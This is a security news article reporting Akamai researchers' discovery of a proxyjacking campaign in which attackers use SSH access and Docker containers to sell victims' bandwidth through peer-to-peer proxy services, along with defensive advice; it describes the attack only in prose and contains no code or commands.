Threat actors are exploiting vulnerable secure shell protocol (SSH) servers to launch Docker services that take advantage of an emerging and lucrative attack vector that hijacks a victim’s network bandwidth for money.
Researchers from the Akamai Security Intelligence Response Team (SIRT) in June discovered the currently active campaign, which employs an emerging type of attack called proxyjacking, the researchers revealed in a blog post last week.
Threat actors use SSH for remote access and then run malicious scripts that enlist victim servers into a legitimate peer-to-peer (P2P) proxy network, such as Peer2Proxy or Honeygain, without their knowledge, the researchers said. These networks — which use companion apps or software installed on Internet-connected devices — allow someone to share Internet bandwidth by paying to use the IP address of the app users.
“This allows for the attacker to monetize an unsuspecting victim’s extra bandwidth, with only a fraction of the resource load that would be required for cryptomining, with less chance of discovery,” Allen West, an SIRT security researcher, wrote in the post.
In a nutshell, that is proxyjacking, an emerging attack model that takes advantage of these services and, on a grand scale, potentially can earn cybercriminals hundreds of thousands of dollars per month in passive income, the researchers found.
While the idea of proxyjacking is not new — think of cryptojacking, an entirely illegal endeavor, as a distant cousin — the ability to easily monetize piggybacking on someone’s bandwidth as affiliates of mainstream companies is new, which explains why security researchers are seeing more proxyjacking in the threat landscape, West warned.
“Providing a simple path to financial gain makes this vector a threat to both the corporate world and the average consumer alike, heightening the need for awareness and, hopefully, mitigation,” he wrote.
Proxyjacking also makes it easy for threat actors to hide their tracks by routing malicious traffic through a multitude of peer nodes before it reaches its final destination, according to the research. This makes the origin of the nefarious activity difficult for victims or researchers to pinpoint — another attractive option for attackers looking to monetize their activity without consequence.
How the Attack Works
The first indication of the attack that Akamai researchers identified came when an attacker established multiple SSH connections to one of the company’s honeypots using a double Base64-encoded Bash script to obscure the activity. They successfully decoded the script and were able to observe the proxyjacking method of the threat actor down to the exact sequence of operations.
The script transformed the compromised system into a node in the Peer2Profit proxy network, using the account specified by $PACCT as the affiliate that will profit from the shared bandwidth, according to Akamai SIRT. The same process was seen being employed for a Honeygain installation awhile later.
“The script was designed to be stealthy and robust, attempting to operate regardless of the software installed on the host system,” West wrote.
The script goes on to execute various functions, one of which is to download an actual, unmodified version of cURL, a command-line tool that enables data exchange between a device and a server through a terminal.
This tool seems to be all the attackers need for the scheme to work, and, “if it is not present on the victim host, then the attacker downloads it on their behalf,” West wrote.
The executable cancels any containers running on the node to install a Docker container to handle the proxyjacking process and, once everything is in place, the attacker can exit the network without a trace.
How Do You Defend Against Proxyjacking?
Because of the growing prevalence of and the relative ease with which attackers can set up proxyjacking attacks, and inability to identify original perpetrators, organizations need to maintain vigilance on their networks so as to notice abnormal behavior in how their resources are being used to avoid compromise, the researchers recommend.
For the particular attack that the Akamai team observed, attackers used SSH to gain access to a server and install a Docker container. To avoid this type of attack, organizations can check their locally running Docker services to locate any unwanted resource sharing the system, according to Akamai. If they find one, the intrusion should be investigated and a determination of how the script was uploaded and run should be made, after which organizations should perform a thorough clean-up.
Also unique to the attack is that the executable in the form of the cURL tool would likely go overlooked by most companies, since that tool can be used legitimately. However, in this case, it was the initial artifact in the attack that led the researchers to investigate deeper, West said.
“It was the ability to look at the source of the artifact that took it from a harmless piece of code to what we now know is part of a proxyjacking scheme,” he explained, which “highlights the importance of being able to isolate all unusual artifacts, not just those that are considered malicious.”
Moreover, because proxyjacking attackers also use vulnerabilities to mount attacks — that was the case in a recent attack that leveraged the infamous Log4j flaw — organizations should maintain updated assets and apply patches to applications whenever available, particularly when vulnerabilities already have been exploited, the research recommends.
West added: “Users with deeper knowledge of computer security can additionally remain vigilant by paying attention to the containers currently running, monitoring network traffic for anomalies, and even running vulnerability scans on a regular basis.”